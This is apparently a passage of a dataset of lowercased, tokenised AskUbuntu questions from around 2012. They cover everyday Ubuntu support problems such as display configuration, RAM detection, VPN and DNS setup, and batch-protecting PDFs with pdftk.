aaaaargh . i ca n't give you a link because it 's a password protected site . here 's what it should look like : http : //i39.tinypic.com/2ev8bi1.png here 's what it looks like in ubuntu 11.10 using firefox 10 http : //i41.tinypic.com/ebdgr7.png i have installed the microsoft font set and also used my firefox config from arch in ubuntu , but the problem persists .
106915	tool for managing unity panel applets	i found many unity applets from another question is there any tool to manage them as in the case of gnome2 ? ie , moving applets , enabaling and disabling applets from a list etc
106916	how do i stop geoip from connecting to the internet every time i boot ?	i 'm trying out ubuntu 12.04 and i noticed that a process called geoip is connecting to the internet at every boot/login . why is this necessary ? how do i disable this behavior ?
106920	how to create ubuntu *server* bootable usb drive using yumi ?	this article suggest to select ubuntu server 10.04 from the list in yumi ( i 'm using windows edition ) . however , the latest yumi does not have ubuntu server 10.04 in the list . the only server version is available in the list is 11.00 , which i am not interested in . anyone knows how to create 10.04 server drive with yumi ?
106926	what music players ( or related applications ) are there that would allow displaying/editing embedded lyrics of music tracks ?	i use osd lyrics and covergloobus . they are good , they search and eventually download lyrics , when they can find them . the sources used by osd lyrics , for example , are rather limited ( although i love the way it displays them . the latter accesses a reacher database , but the display is not adjustable as far as i know ) . could n't find a way to make these programs see lyrics from a file selected by me . what i want is to be able to add the lyrics myself , and even to embed them into the music file - and , of course , to display them from there . the last feature alone would be very valuable to me , as i have a large music database with lyrics already embedded , but i can not see them with these programs : they are just looking for new lyrics on the internet , although the lyrics are on my computer . in windows i used foobar2000 to find , display and embed lyrics ( with the add-on lyricsgrabber ) and when i needed to add the lyrics manually i used to embed them in mediamonkey ( this player allows finding them , but also editing and embedding - just by copy/paste ) . i am not able to run mediamonkey in wine . foobar works , but with a lot of problems . and anyway , wine is of last resort . i am looking for a linux program that would be able to do something similar to what i have described above .
106933	how to save the current xorg configuration to xorg.conf ?	i 've this situation/hardware on my desktop pc : ubuntu linux oneiric 11.10 ( 32 bit ) monitor asus vw222s ( 22 '' ) 01:00.0 vga compatible controller : nvidia corporation g92 [ geforce 8800 gs ] ( rev a2 ) nvidia driver version : 280.13 i 've no problem with my actual configuration and i can achieve 1680x1050 as expected . what 's the problem then ? well , i 've bought this vga switch : http : //www.mayflash.com/ ? products/xboxxbox360/vga002.html to be able to share my monitor with my desktop pc and my xbox but if i connect the monitor through the vga adapter , the monitor capabilites are not recognized and i can only have 1024x600 resolution . please note this ( it 's important ) : case a ) if i boot ubuntu with this configuration monitor -- - > pc , then i disconnect cables and attach them to use the vg switcher , having this configuration : monitor -- -- > vga switcher -- -- > pc , i can have 1680x1050 resolution . case b ) if i boot ubuntu directly using the vga switcher : monitor -- - > vga switcher -- - > pc , the monitor capabilities are not recognized and i can not have 1680x1050 . so , since i do n't want to plug-unplug-plug-unplug the cables everytime ( else i would not have bought a vga switcher ... . ) my idea is that forcing a proper xorg.conf configuration , i could avoid the detection of the monitor on each boot and force xorg to use that configuration . the question are : 1 ) how do i save the current xorg configuration to a xorg.conf file ? 2 ) how do i force xorg to use xorg.conf configuration on each boot without detecting it each time ? i hope i 've given all the informations you need to help me . please tell me if you need to know more . thanks . p.s : i 've already tried to use the xorg.conf generated by nvidia-settings tool , but as you can see it does n't contain anything about the current 1680x1050 resolution http : //pastebin.com/j8eba83d === update # 1 === i 've tried the method you suggested me and this is the generated xorg.conf # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 280.13 ( buildd @ rothera ) thu aug 11 17:28:49 utc 2011 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor0 '' vendorname `` unknown '' modelname `` ancor communications inc vw222 '' horizsync 31.0 - 81.0 vertrefresh 56.0 - 75.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce 8800 gs '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` twinview '' `` 0 '' option `` twinviewxineramainfoorder '' `` crt-0 '' option `` metamodes '' `` 1680x1050_60 +0+0 ; nvidia-auto-select +0+0 '' subsection `` display '' depth 24 endsubsection endsection if i disconnect the monitor for a minute and i attach it through the vga switcher , the resolution is perfect and the monitor is correctly set to 1680x1050 @ 60hz look at this screenshot : this means it is working nice . what 's the problem then ? the problem is that if i reboot ubuntu using the generated xorg.conf i 've pasted before the fonts are all displayed ugly and the images are blurred . the resolution of the screen is 1680x1050 , but the monitor is using another resolution an i suppose it 's enlarging the screen image . i 'll post another picture later in update # 2 so you can see with your eyes . === update # 2 === i 've rebooted ubuntu using the configuration i posted and ... it works ! probably the previous time i generated it i did n't specify the 60 hz in the nvidia-settings tool and that value was not saved . for now it 's working . now i ca n't wait to have also my xbox vga cable ; )
106934	installation only recognizes 3 gb of memory after ram upgrade	i recently upgraded my system from 2 to 4 gb of memory . when i booted into ubuntu , it 's only recognizing 3 gb . i followed some instructions on adding the pae ; now when i boot up my kernel has switched from generic to pae but i 'm still only showing 3 gb . how do i get it to read all 4 gb ? i went to the software center and found the pae , then when i clicked `` more info '' it shows a few more packages with it but they are n't checked . should i check them to be added also ? will this make ubuntu recognize my 4 gb ?
106936	how to find mac osx uid from ubuntu	how do you view mac osx user id without having to boot into osx ? i can mount the drive , but i ca n't find the uid for my user , which would hopefully enable me to access files without being root .
106941	how do i run a script once and only once in upstart ?	i have a script that starts on desktop-session-start . the first person who logs in graphically after a boot will have this script called . i want it called once , not every time a person logs in . how do i make a script perform just once ? # one time script start on desktop-session-start stop on somebodystopme script ... end script
106943	back up the whole ubuntu system or system image creation	in windows back is very easy with norton ghost . run it and forget it , what is the same type of software for backing up the ubuntu system ? i tried dup back up but it failed to restore when i really needed it . can you suggest anything regarding system back up for linux systems ?
106944	electric sheep does not start	electric sheep was working on my computer under ubuntu 11.10 as a screen saver . suddenly , here was a problem - electricsheep does not download any sheeps and nothing shows . here is the output of electricsheep -- debug 1 : ===================================== electric sheep v2.7b12 time start thu feb 23 14:14:13 2012 init_curl_cmd 0 curl_cmd = nice -n 10 curl -- location -- silent -- show-error server = v2d7c.sheepserver.net play_counts init , thread=main play counts : 59312:28 updating cache path=/home/uran777/.electricsheep/ thread main compute ranks median rank undefined begin delete cached 0 nothing cached init_curl_cmd 1 query nice -n 10 curl -- location -- silent -- show-error 'http : //community.sheepserver.net/query.php ? q=redir & u=uran777 & p=d0d2b4063298bcbcb3b8ced231db9617 & v=lnx_2.7b12 & i=348fcee3056cd941' updating cache path=/home/uran777/.electricsheep/ thread display compute ranks median rank undefined time display loop thu feb 23 14:14:13 2012 cleanup_and_exit 1 handle_sig_term waiter 0 cleanup . writing play counts handle_sig_term display 15 cleanup . nplays = 0 , nloopplays = 0 , nrestarts = 0 , ncached_sheep = 0 count standard deviation undefined handle_sig_term main 15 writing play counts cleanup . handle_sig_term download 15 writing play counts cleanup . writing play counts завершено is it possible to somehow solve this problem ?
106946	how do i know which graphics card is being used in a hybrid system ?	i have an acer aspire 5935g . it comes with hybrid grahics solution from nvidia . it has two graphic cards ; nvidia geforce 130gt m ( discrete ) and intel mobile graphics series 4 . i have just installed ubuntu 11.10 but i get no information about what graphics card the notebook is currently using . also how can i use only one of them permanently ( preferably intel graphics ) , while disabling the other ?
106950	after 12.04 release would 10.04 still be lts ?	silly question , but given that i have upgraded and downgraded from lucid to natty and back , and after some months of anticipation , lucid to oneiric then back , would the lts cycle of lucid end in april ?
106952	interactive firewall	i have ubuntu server 10.04 serving as router/firewall with iptables . also have number of client computers in lan . so far so good . now what i need is some sort of interactive firewall software on server , which i can turn on and it will ask me to allow/disallow outgoing connection ( from console ) from my particular lan pcs through firewall to internet . ultimate goal is to suspend all kind of suspicious connections/calls to home . currently this job is done using little snitch on each macos computer , causing additional load on each client to monitor for outgoing traffic ( not to mention that it 's paid app ) . so i thought maybe it 's possible to centralize it on my ubuntu server .
106959	issues with quickly : tk-warning ** : unable to locate theme engine in module_path : `` pixmap ''	i 'm fairly new to ubuntu , and i decided that i want to learn to develop applications for it . i found some great tutorials , and installed quickly and started to play around with app development . for some reason though , when i typed in `` quickly create ubuntu-application hello-world '' like the tutorial said , the terminal window said the normal '' creating project directory hello-world creating bzr repository and committing launching your newly created project ! '' but then said ( hello-world:23506 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( hello-world:23506 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( hello-world:23506 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( hello-world:23506 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , the `` hello world '' application launched seemingly fine after that , but is it a problem ? if so , how can i eliminate it ? i 'm on ubuntu 11.10 .
106961	share internet connection	my system has 2 network cards , one wired and one wireless . i 've a local cable net connected to my ethernet card . now i want to share my internet connection using wireless . i tried this solution , but , it did not worked for me .
106963	virtualbox ubuntu server with dns using dnsmasq	i just want to have a local server inside my virtualbox that offers dns functionality like www.example.local = > 127.0.0.1 . my host operating system is ubuntu 11.10 and guest is ubuntu 10.10 . on my server i can already ping www.example.local - so i configured my virtual host correctly . question is , how can i address www.example.local from outside my virtualbox ? i searched google and askubuntu and found dnsmasq . i installed dnsmasq on my server and followed all steps on help.ubuntu . on my host system i 've set 192.168.178.91 to the list of dns servers ( 192.168.178.91 is the ip address of my local server which uses a bridged network adapter ) . thing is , i still can not ping ( or connect to ) my example.local virtual host . it gives me an unknown host response . how can i set up my dns server correctly ?
106968	how do i get to the options in nvlc ?	i recently found out about the ncurses vlc command line interface , nvlc and tried to access the options with no success ; the nvlc -option command as the help manual suggested did n't do anything i 'm trying to make the nvlc -- nocolor command permanent to solve a terminal transparency issue . does anyone know how to get to the options ?
106976	why does n't ubuntu detect all of my ram on 64-bit ?	issue identified : bios bug . see dmesg output below . question is : how to resolve this ? change made since 2.6.32 have introduced this . is there a patch canonical or the kernel maintainers can provide to fix this ? who do i refer this to ? thanks everyone ! original question : i think there is an issue with the 64-bit 2.6.35 kernel that ships with ubuntu 10.10 . i have a gigabtye ga-970a-ud3 with an amd fx-8120 processor , 16gb ddr3-1333 , nvidia gtx550ti and an ocz agility 3 120gb ssd . i installed ubuntu 10.10 on it to get ssd trim support with the 2.6.35 kernel . however , after successful os install , system monitor only reports 3.2gb . it sees the 8 cores of the fx-8120 and the uname -a reports *x86_64* . furthermore , dmidecode shows the four banks of memory being filled . suspecting memory , i swapped out the 16gb for 8gb from a different manufacturer but still the same issue exists . 10.10 with a 2.6.35 kernel wo n't see more than 4gb on 64-bit . i have a 64-bit 10.04 lts install on an i7-960 with 24gb ram and it sees all 24gb . when i boot the 64-bit 10.04 lts on the fx-8120 machine , it sees all 16gb and 8 cores . clearly something has changed between 2.6.32 and 2.6.35 to affect the memory support . i am after the trim support of 2.6.35 but not at the cost of losing 75 % of my ram . i am looking for some guidance or suggestions . is a new kernel flag required or do i need to get a custom build of 2.6.33 onward to resolve the trim support and memory issue simultaneously . any help appreciated ! update : the version of 10.04 lts installed is whatever iso the ubuntu download site provides for the 10.04 64-bit release . i have turned on `` download updates '' while installing so whatever 10.04 lts currently does on a clean install with that iso is what i am running . i can provide outputs for whatever commands are requested to determine the exact builds/revisions this machine is on . i am also going to test boot 10.10 on my i7-960 to see if it reports 4gb vs. 24gb . this would eliminate chipset support as a potential issue since it would cross architectural boundaries and indicate a kernel issue . update 2 : it is a bios bug . dmesg output snippet : [ 0.000000 ] initializing cgroup subsys cpuset [ 0.000000 ] initializing cgroup subsys cpu [ 0.000000 ] linux version 2.6.35-22-generic ( buildd @ allspice ) ( gcc version 4.4.5 ( ubuntu/linaro 4.4.4-14ubuntu4 ) ) # 33-ubuntu smp sun sep 19 20:32:27 utc 2010 ( ubuntu 2.6.35-22.33-generic 2.6.35.4 ) [ 0.000000 ] command line : boot_image=/boot/vmlinuz-2.6.35-22-generic root=uuid=9129347f-e2a2-4b97-965c-800823aaf090 ro quiet splash [ 0.000000 ] bios-provided physical ram map : [ 0.000000 ] bios-e820 : 0000000000000000 - 000000000009a000 ( usable ) [ 0.000000 ] bios-e820 : 000000000009f800 - 00000000000a0000 ( reserved ) [ 0.000000 ] bios-e820 : 00000000000f0000 - 0000000000100000 ( reserved ) [ 0.000000 ] bios-e820 : 0000000000100000 - 00000000cfda0000 ( usable ) [ 0.000000 ] bios-e820 : 00000000cfda0000 - 00000000cfdd1000 ( acpi nvs ) [ 0.000000 ] bios-e820 : 00000000cfdd1000 - 00000000cfe00000 ( acpi data ) [ 0.000000 ] bios-e820 : 00000000cfe00000 - 00000000cff00000 ( reserved ) [ 0.000000 ] bios-e820 : 00000000e0000000 - 00000000f0000000 ( reserved ) [ 0.000000 ] bios-e820 : 00000000fec00000 - 0000000100000000 ( reserved ) [ 0.000000 ] bios-e820 : 0000000100000000 - 000000042f000000 ( usable ) [ 0.000000 ] nx ( execute disable ) protection : active [ 0.000000 ] dmi 2.4 present . [ 0.000000 ] e820 update range : 0000000000000000 - 0000000000001000 ( usable ) == > ( reserved ) [ 0.000000 ] e820 remove range : 00000000000a0000 - 0000000000100000 ( usable ) [ 0.000000 ] no agp bridge found [ 0.000000 ] last_pfn = 0x42f000 max_arch_pfn = 0x400000000 [ 0.000000 ] mtrr default type : uncachable [ 0.000000 ] mtrr fixed ranges enabled : [ 0.000000 ] 00000-9ffff write-back [ 0.000000 ] a0000-bffff uncachable [ 0.000000 ] c0000-c7fff write-protect [ 0.000000 ] c8000-fffff uncachable [ 0.000000 ] mtrr variable ranges enabled : [ 0.000000 ] 0 base 000000000000 mask ffff80000000 write-back [ 0.000000 ] 1 base 000080000000 mask ffffc0000000 write-back [ 0.000000 ] 2 base 0000c0000000 mask fffff0000000 write-back [ 0.000000 ] 3 base 0000cfe00000 mask ffffffe00000 uncachable [ 0.000000 ] 4 disabled [ 0.000000 ] 5 disabled [ 0.000000 ] 6 disabled [ 0.000000 ] 7 disabled [ 0.000000 ] x86 pat enabled : cpu 0 , old 0x7040600070406 , new 0x7010600070106 [ 0.000000 ] e820 update range : 00000000cfe00000 - 000000042f000000 ( usable ) == > ( reserved ) [ 0.000000 ] warning : bios bug : cpu mtrrs do n't cover all of memory , losing 13040mb of ram . [ 0.000000 ] -- -- -- -- -- -- [ cut here ] -- -- -- -- -- -- [ 0.000000 ] warning : at /build/buildd/linux-2.6.35/arch/x86/kernel/cpu/mtrr/cleanup.c:971 mtrr_trim_uncached_memory+0x2d8/0x303 ( ) [ 0.000000 ] hardware name : ga-970a-ud3 [ 0.000000 ] modules linked in : [ 0.000000 ] pid : 0 , comm : swapper not tainted 2.6.35-22-generic # 33-ubuntu [ 0.000000 ] call trace : [ 0.000000 ] [ < ffffffff8106077f > ] warn_slowpath_common+0x7f/0xc0 [ 0.000000 ] [ < ffffffff810607da > ] warn_slowpath_null+0x1a/0x20 [ 0.000000 ] [ < ffffffff81af7970 > ] mtrr_trim_uncached_memory+0x2d8/0x303 [ 0.000000 ] [ < ffffffff81af2910 > ] setup_arch+0x422/0x79e [ 0.000000 ] [ < ffffffff815864c9 > ] ? printk+0x68/0x6f [ 0.000000 ] [ < ffffffff81aed9f3 > ] start_kernel+0xdd/0x390 [ 0.000000 ] [ < ffffffff81aed341 > ] x86_64_start_reservations+0x12c/0x130 [ 0.000000 ] [ < ffffffff81aed43f > ] x86_64_start_kernel+0xfa/0x109 [ 0.000000 ] -- - [ end trace a7919e7f17c0a725 ] -- - [ 0.000000 ] update e820 for mtrr dmidecode -t memory : # dmidecode 2.9 smbios 2.4 present . handle 0x0005 , dmi type 5 , 24 bytes memory controller information error detecting method : 64-bit ecc error correcting capabilities : none supported interleave : one-way interleave current interleave : one-way interleave maximum memory module size : 1024 mb maximum total memory size : 4096 mb supported speeds : 70 ns 60 ns supported memory types : standard edo memory module voltage : 3.3 v associated memory slots : 4 0x0006 0x0007 0x0008 0x0009 enabled error correcting capabilities : none handle 0x0006 , dmi type 6 , 12 bytes memory module information socket designation : a0 bank connections : 1 current speed : 53 ns type : other unknown edo installed size : 4096 mb ( double-bank connection ) enabled size : 4096 mb ( double-bank connection ) error status : ok handle 0x0007 , dmi type 6 , 12 bytes memory module information socket designation : a1 bank connections : 2 current speed : 53 ns type : other unknown edo installed size : 4096 mb ( double-bank connection ) enabled size : 4096 mb ( double-bank connection ) error status : ok handle 0x0008 , dmi type 6 , 12 bytes memory module information socket designation : a2 bank connections : 3 current speed : 53 ns type : other unknown edo installed size : 4096 mb ( double-bank connection ) enabled size : 4096 mb ( double-bank connection ) error status : ok handle 0x0009 , dmi type 6 , 12 bytes memory module information socket designation : a3 bank connections : 4 current speed : 53 ns type : other unknown edo installed size : 4096 mb ( double-bank connection ) enabled size : 4096 mb ( double-bank connection ) error status : ok handle 0x0029 , dmi type 16 , 15 bytes physical memory array location : system board or motherboard use : system memory error correction type : none maximum capacity : 16 gb error information handle : not provided number of devices : 4 handle 0x002a , dmi type 17 , 27 bytes memory device array handle : 0x0029 error information handle : not provided total width : 64 bits data width : 64 bits size : 4096 mb form factor : dimm set : none locator : a0 bank locator : bank0/1 type : unknown type detail : none speed : 1333 mhz ( 0.8 ns ) manufacturer : serial number : asset tag : part number : handle 0x002b , dmi type 17 , 27 bytes memory device array handle : 0x0029 error information handle : not provided total width : 64 bits data width : 64 bits size : 4096 mb form factor : dimm set : none locator : a1 bank locator : bank2/3 type : unknown type detail : none speed : 1333 mhz ( 0.8 ns ) manufacturer : serial number : asset tag : part number : handle 0x002c , dmi type 17 , 27 bytes memory device array handle : 0x0029 error information handle : not provided total width : 64 bits data width : 64 bits size : 4096 mb form factor : dimm set : none locator : a2 bank locator : bank4/5 type : unknown type detail : none speed : 1333 mhz ( 0.8 ns ) manufacturer : serial number : asset tag : part number : handle 0x002d , dmi type 17 , 27 bytes memory device array handle : 0x0029 error information handle : not provided total width : 64 bits data width : 64 bits size : 4096 mb form factor : dimm set : none locator : a3 bank locator : bank6/7 type : unknown type detail : none speed : 1333 mhz ( 0.8 ns ) manufacturer : serial number : asset tag : part number : uname -a linux artemis 2.6.35-22-generic # 33-ubuntu smp sun sep 19 20:32:27 utc 2010 x86_64 gnu/linux
106979	what steps should i take when i find wrong information in the ubuntu wiki pages ?	i sometimes end up in a ubuntu wiki page when looking for information . most of the times that information is a bit out dated , which is fine , others its mostly wrong or does not reflect the actuality . if i find information on the ubuntu wiki that is very wrong or even considered dangerous what steps should i take to try to fix it ?
106982	replacement for non-interactive `` chpasswd -e '' ?	on older debian machines one could issue something like : echo ' < username > : *'|chpasswd -e in order to change the password field of the user ( < username > ) to * . now i am aware of passwd -d < username > & & passwd -l < username > to achieve a similar effect and set the password field to ! . however , on some newer vanilla ubuntu configurations ( in particular 10.04 lts ) this leads to the user not being able to log into the machine anymore ( for example via ssh and key ) - with : your account has expired ; please contact your system administrator . - even though passwd ( 1 ) `` warns '' that this is possible . now that 's exactly what i want to achieve , though . manually changing the field in the /etc/shadow file from ! to * fixes the issue , but there seems to be no scriptable way to achieve the same without directly fiddling with the shadow file ( e.g . with sed ) . chpasswd -e used to be a convenient alternative , but that has been obviously removed . so what i am looking for is either a variation of passwd -l that lets me choose the token that gets written into the file or any other kind of replacement for the exact functionality that chpasswd -e offered . nb : * is already used for system accounts alright , and there seems to be a semantic difference to pam or whatever between ! and * in the password field . also note : on debian 5 and 6 chpasswd -e works . so the functionality must have gotten stripped deliberately in ubuntu . i tested ubuntu 9.10 , 10.04 ( they do n't have it ) , 11.04 and 11.10 have chpasswd -e .
106984	why do i see multiple processes with the same name	sometimes when i open the system monitor i see multiple processes with the same name . some examples are the plugin-container , gwibber and others . why do they appear multiple times in system manager and is there a way to at least visibly unite them together so it shows the same process .
106988	mp4 video 's from web site will not play	i ca n't get video files to play in either chromium or firefox , when i try and load them from the web site this is what i get `` the video could not be loaded , either because the server or network failed or because the format is not supported : http : //media.woodsmith.com/etip/2012/02/woodsmithtipsintro_02162012.mp4 ''
106990	how to disconnect internet when vpn fails ?	normally i 'm connected to the internet with a vpn , but sometimes it fails and some programs may automatically start to use the default unsecure connection . how do i disconnect all the internet until the vpn connection is back up ? i want to make sure all the traffic goes exclusively over vpn .
106995	linphone - only default sound device available ?	first of al.. linphone is the first ( and only ) voip client i found so far that is free.. looks decent and most importand : it does n't crash ( ekiga - crashes randomly lol ) . i use softphone for business ( duo to me being in china and the phone number from europe.. it kind of requires internet if you want to do it cheap ) . linphone works perfect but has one little glitch : it does n't pick up on sound devices.. it just shows default alsa and default oss . in total what i want to achieve is - 1 ) ring device on speakers 2 ) microphone & output sound on headset . ubuntu it self sees them all perfectly fine in sound settings.. anyone any ideas on this ? i saw something about linphone using soundlist.. but that command does n't exist in ubuntu ? regards , marco
107006	speeding up a mono compilation / installation	can you configure and make a mono installation on one server , then copy the files over to another server and simply run `` make install '' to install on the other server ? or do you absolutely have to rebuild the source on every machine ? if it 's possible , what directories do i need to copy over ?
107007	if a key press does n't trigger anything in xev , is it still possible to use it for a key binding ?	i 'd like to register keypresses that are n't visible on xev . these are basically `` special '' keys on my keyboard . if the event does show up on xev , is it possible to get at ?
107008	how to speed up compilation of ubuntu apps ( make , cmake , gcc )	i am compiling some programs here and i have 4 cores . is there a way to tell make , cmake or gcc to compile using all cores or something to that affect .
107009	how would you configure byobu as a login shell ?	i need to have my telnet and ssh users use byobu as their login shell . i would like to avoid using .login/.profile/.bashrc and the likes to spawn byobu . i 'd like to have byobu as the shell defined in /etc/passwd . i 've already done a few tests , but have been unable to have it working properly . any idea ?
107010	how to check wich disk and partition i am using to boot this system ?	i want to know wich disk and partition i am using to boot this system ? for example ( hd0,0 ) i got this : luke @ ubuntu : ~ $ sudo fdisk -l disk /dev/sda : 30.1 gb , 30064771072 bytes 255 heads , 63 sectors/track , 3655 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00012b4f device boot start end blocks id system /dev/sda1 * 1 3499 28101632 83 linux /dev/sda2 3499 3656 1255425 5 extended /dev/sda5 3499 3656 1255424 82 linux swap / solaris luke @ ubuntu : ~ $ but it does n't tell me about ( hd ? , ? ) thank you .
107011	bzr error when trying to branch code	for example when i run the command bzr branch lp : totem , i am getting error gaurav @ gaurav-hcl-me-laptop : ~/bzr $ bzr branch lp : totem you have not informed bzr of your launchpad id , and you must do this to write to launchpad or access private data . see `` bzr help launchpad-login '' . bzr : error : target directory `` '' already exists . the present working directory is empty . i 've tried on two systems , both running 12.04 and i 'm getting the same result .
107012	pdftk password protection help	i am using ubuntu 11.10 and am looking for a solution to password protect a bunch of pdf files in a directory in batch . i came across pdftk and it looks like it might do what i need , but i 've reviewed the command line pdftk examples and ca n't figure out if there is a way to do it in batch without having to individually specify the output file name for every file . i 'm hoping a command-line guru can take a look at the pdftk syntax and tell me if there is some trick / command that will allow me to password protect a directory of pdf files ( e.g. , *.pdf ) and overwrite the existing files using the same name , or consistently rename the individual output files without having to specify each output name individually . here 's a link to the pdftk command line examples page : http : //www.pdflabs.com/tools/pdftk-the-pdf-toolkit/ thanks for your help . i think i 've answered my own question . here 's a bash script that appears to do the trick . i 'd welcome help evaluating why the code i 've commented out does n't work ... # ! /bin/bash # created by dave , 2012-02-23 # this script uses pdftk to password protect every pdf file # in the directory specified . the script creates a directory named `` protected_ [ date ] '' # to hold the password protected version of the files . # # i 'm using the `` user_pw '' parameter , # which means no one will be able to open or view the file without # the password . # # pdftk must be installed for this script to work . # # usage : ./protect_with_pdftk.bsh [ file ( s ) ] # [ file ( s ) ] can use wildcard expansion ( e.g. , *.pdf ) # this part is n't working ... . ignore . the goal is to avoid errors if the # directory to be created already exists by only attempting to create # it if it does n't exists # # target_dir= '' protected_ $ ( date + % f ) '' # if [ -d `` $ target_dir '' ] # then # echo # echo `` $ target_dir directory exists ! '' # else # echo # echo `` $ target_dir directory does not exist ! '' # fi # mkdir protected_ $ ( date + % f ) for i in *pdf ; do pdftk `` $ i '' output `` ./protected_ $ ( date + % f ) / $ i '' user_pw [ password ] ; done echo `` complete . output is in the directory : ./protected_ $ ( date + % f ) ''
107013	how to change color of unity workspace border , and window resize	currently running ubuntu 11.10 . so i 've been doing a lot of work on a new theme to match the physical look of my laptop which is a blue , black , white theme . obviously orange visuals look out of place . which leads me to the borders in unity workspace , and the highlight color you get when resizing windows ( ex . snapping windows ) . really just have no clue where the config files for this is , or if it is even possible to change them . i would like to make all the orange you see in the two pictures blue . any help is always appreciated .
107014	which webcam software provides live `` fire effects '' ?	i am looking for a webcam app that creates live effects . cheese has 9 effects but it does not have the fire effect i am looking for . an effect i saw several years ago with a flash web app . by fire effect i mean the effect in the screenshot attached below :
107031	unable to locate package ubuntu-restricted-extras and software center issue	i use lenovo g450 and just installed 11.10 , but had n't checked third party software installation at that time . now , when i code `` sudo apt-get install ubuntu-restricted-extras , '' i am getting this message `` unable to locate package ubuntu-restricted-extras '' . also , when i try from software center , there is `` updating cache '' running from long time and this selection for restricted-extras adds two more `` updating cache '' and `` enabling component of the distribution '' . all in waiting mode . what should i do ? ?
107034	can not install anything in ubuntu software center	i have freshly isntalled ubuntu and installed some custom drivers for my usb modem to surf the net . problem is everything works perfectly in ubuntu 10.10 but in 11.10 what happens is that i can surf the net with firefox but when i open software centre , i dont see any option to install any application ... the place where install usually is has a greyed out button names `` use the source '' instead ... .. this is so frustrating ! ... . doing stuff from my terminal works though.. any ideas ?
107035	sound is low on 11.10 compared to win 7	i dual boot 11.10 64bit/ windows 7 on my hp pavilion dv 6700 . i noticed that on 11.10 even when volume is at its maximum , the sound is really low compared to windows 7 . what could be the cause or is it a bug ?
107053	enlarging ubuntu partition after installation	i have windows 7 and ubuntu 11.10 installed on same hard drive on different partitions . windows has about 550gb and ubuntu only 50gb . i had installed ubuntu just to test for first so i chose this quite limited partition size . i tried on windows shrinking the partition of windows , no problems with that . but , if i expand the ubuntu partition for instance with gparted , will it cause data loss ? does it just smoothly increase the size of ubuntu partition or corrupt all the files ?
107056	how to install ubuntu over fedora 15 wihtout having tons of options in the loader ?	i currently have windows vista and fedora 15 dual booting on my system . i need to keep my vista for work related stuff , and as a fairly new linux uses am having problems with drivers in fedora ( wifi , sound , web cam not working ) . i have used ubuntu on another system and find i am more comfortable with it . i want to install the latest ubuntu over my fedora partition , but i dont want the loader to be populated with 5 or 6 different boot options . i 've read online that you can revert to the original windows logger by using the windows cd , but i do not have that . can anyone guide me on how i can switch fedora with ubuntu and not have a grub logger that is full of invalid or left over boot options from having had fedora ? thanks in advance
107061	is there an alternate keyboard combination for the up key in bash ?	i recently discovered that , in a terminal , ctrl-i is the same as tab ( which is very useful on my phone , where there are no arrow keys nor tab ) . on a normal terminal pressing the up key navigates the history . is there another way to recall the last command ?
107062	can i use the ubuntu font in a proprietary application ?	huge ubuntu fan here , i really like the ubuntu font , but as far as i know you may only use it in open-source applications . i want to use it in an iphone/ipad app . due to apple 's contracts , i ca n't make the project open-source . so , the question actually is , is it allowed to use/distribute the ubuntu font in an iphone/ipad application ( free or paid ) ? would be great if that 's allowed !
107066	/root/sys failed , netbook wo n't boot up properly	so , i boot up my netbook ... and the main screen comes on , announcing acer and whatnot . then , it goes to to a black screen with a cursor in the upper left hand corner that blinks . for a long time . then a screen pops up . generally it says something like this : mount : mounting /dev/disk/by and a lot of stuff following that a lot of it involves : /root/sys failed : no such file or directory and target filesystem does n't have /sbin/init . '' no init found . try passing init = bootarg . what can i do ? i 'm fairly certain my netbook is functioning , but is my software not ? is this a matter of reinstalling , or can i do something else to fix ?
107067	will wubi become one of the standard methods of installing and using ubuntu , long-term ?	since most laptops come with preformed partitions and manufacturer recovery partition , linux newbies like me , who are not full-time linux users , but love its beauty & concept and want to enjoy it risk-free , find wubi as a life-saver . my question is to know if wubi will continue to be a safe and dependable way of installing and using ubuntu , long-term .
107070	do i need same monitor sizes and resolutions for multi monitor support	i am testing 12.04 because it has better multi monitor support but i was wondering do i need to have the same size/resolution for it to work correctly . for example the first monitor is a 32 ' tv with 1920x1080 resolution . do i need another one with the same inches , resolution or both the same for it to work correctly .
107071	how to see what installed packages i have never used for cleaning purposes	i want to do some clean up and was wondering how can i see what packages i have never used or has been very long since i used them .
107072	use local network while vpn 'd into another network	so i 'm at work and i vpn into a remote network . both networks have their own dns servers that have hostnames that resolve to internal ip 's . i 've set it up in network manager so i can ping internal ip 's on both networks ( including the dns servers ) but i ca n't get dns lookup on both networks simultaneously . $ cat /etc/resolv.conf # generated by networkmanager search company.com nameserver 172.16.66.254 nameserver 192.168.0.6 nameserver 192.168.0.7 i 'm using ubuntu 11.04 64-bit desktop . where 172.16.66.254 is the vpn dns server and 192.168.0.6 and 7 are the local dns servers . will i need to run some sort of local dns server that pulls from both ? edit : dig -b 192.168.0.51 mylocalserver ; < < > > dig 9.7.3 < < > > -b 192.168.0.51 mylocalserver ; ; global options : +cmd ; ; got answer : ; ; - > > header < < - opcode : query , status : servfail , id : 42426 ; ; flags : qr rd ra ; query : 1 , answer : 0 , authority : 0 , additional : 0 ; ; question section : ; mylocalserver . in a ; ; query time : 0 msec ; ; server : 192.168.0.6 # 53 ( 192.168.0.6 ) ; ; when : thu feb 23 14:01:40 2012 ; ; msg size rcvd : 23
